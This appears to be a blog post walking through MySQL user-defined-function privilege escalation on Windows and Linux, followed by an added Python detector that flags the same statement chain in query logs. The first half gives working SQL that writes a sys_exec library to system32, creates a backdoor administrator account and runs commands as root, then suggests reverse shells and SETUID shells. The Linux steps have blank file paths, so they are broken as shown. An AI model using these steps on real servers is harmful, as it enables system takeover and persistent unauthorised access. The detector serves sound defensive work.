MySQL User-Defined Function (UDF) Privilege Escalation (Windows & Linux)

We will get into writing our own functions in later posts, but for now the compiled UDF shared objects from sqlmap work well.

Windows Escalation

mysql> USE mysql;
mysql> CREATE TABLE pwn(line blob);
mysql> INSERT INTO pwn values(load_file('C://xampplite//htdocs//mail//lib_mysqludf_sys.dll'));
mysql> SELECT * FROM mysql.pwn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
mysql> CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
mysql> SELECT sys_exec("net user pwned pwn123! /add");
mysql> SELECT sys_exec("net localgroup Administrators pwned /add");

Linux Escalation

mysql> use mysql;
mysql> create table pwn(line blob);
mysql> insert into pwn values(load_file('/home/npn/'));
mysql> select * from pwn into dumpfile '/usr/lib/';
mysql> create function sys_exec returns integer soname '';
mysql> select sys_exec('id > /tmp/out; chown npn.npn /tmp/out');

Verify Command Execution

user@box:/$ cat /tmp/out
uid=0(root) gid=0(root) groups=0(root)

You can now execute code as root; what more do you need? You can allow passwordless sudo for all commands, create a SETUID shell program in C, execute a reverse shell, and so on. Whatever you want; be creative.
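
Seen from the database server's side, the statement sequence above (library written with INTO DUMPFILE, CREATE FUNCTION ... SONAME, then a call to the new function) stands out in the MySQL general query log. The detector below is an added example, not part of the original post: the log lines are constructed, and the names detect_udf_abuse and full_chain_connections are hypothetical.

```python
import re

# Constructed sample in general-query-log layout: time, connection id, command, statement.
SAMPLE_LOG = """\
2024-05-01T10:00:01.000000Z\t   41 Query\tSELECT name FROM shop.items WHERE id = 7
2024-05-01T10:02:10.000000Z\t   57 Query\tSELECT * FROM mysql.pwn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll'
2024-05-01T10:02:15.000000Z\t   57 Query\tCREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll'
2024-05-01T10:02:20.000000Z\t   57 Query\tSELECT sys_exec("net user pwned pwn123! /add")
2024-05-01T10:03:00.000000Z\t   63 Query\tSELECT id INTO DUMPFILE '/tmp/report.bin' FROM shop.items LIMIT 1
"""

LINE = re.compile(r"^\S+\s+(\d+)\s+Query\s+(.*)$")
# A shared library (.dll / .so) written to disk through SQL.
LIB_WRITE = re.compile(r"INTO\s+(?:DUMPFILE|OUTFILE)\s+['\"]([^'\"]+\.(?:dll|so))['\"]", re.I)
# Registration of a native UDF: CREATE [AGGREGATE] FUNCTION name RETURNS type SONAME 'lib'.
UDF_CREATE = re.compile(
    r"CREATE\s+(?:AGGREGATE\s+)?FUNCTION\s+`?(\w+)`?\s+RETURNS\s+\w+\s+SONAME\s+['\"]([^'\"]*)['\"]",
    re.I)
STAGES = {"library_write", "udf_create", "udf_call"}

def detect_udf_abuse(log_text):
    """Return (connection_id, stage, detail) findings in log order."""
    findings, udf_names = [], set()
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        conn, sql = int(m.group(1)), m.group(2)
        lib, udf = LIB_WRITE.search(sql), UDF_CREATE.search(sql)
        if lib:
            findings.append((conn, "library_write", lib.group(1)))
        elif udf:
            udf_names.add(udf.group(1).lower())  # UDFs are server-wide, so track globally
            findings.append((conn, "udf_create", f"{udf.group(1)} <- {udf.group(2)}"))
        else:
            for name in sorted(udf_names):
                if re.search(rf"\b{re.escape(name)}\s*\(", sql, re.I):
                    findings.append((conn, "udf_call", name))
    return findings

def full_chain_connections(findings):
    """Connections that performed all three stages: the highest-confidence alert."""
    seen = {}
    for conn, stage, _ in findings:
        seen.setdefault(conn, set()).add(stage)
    return sorted(c for c, s in seen.items() if STAGES <= s)

if __name__ == "__main__":
    for finding in detect_udf_abuse(SAMPLE_LOG):
        print(finding)
```

Any single stage is worth an alert on its own; the ordinary DUMPFILE write from connection 63 is not flagged because it does not produce a .dll or .so.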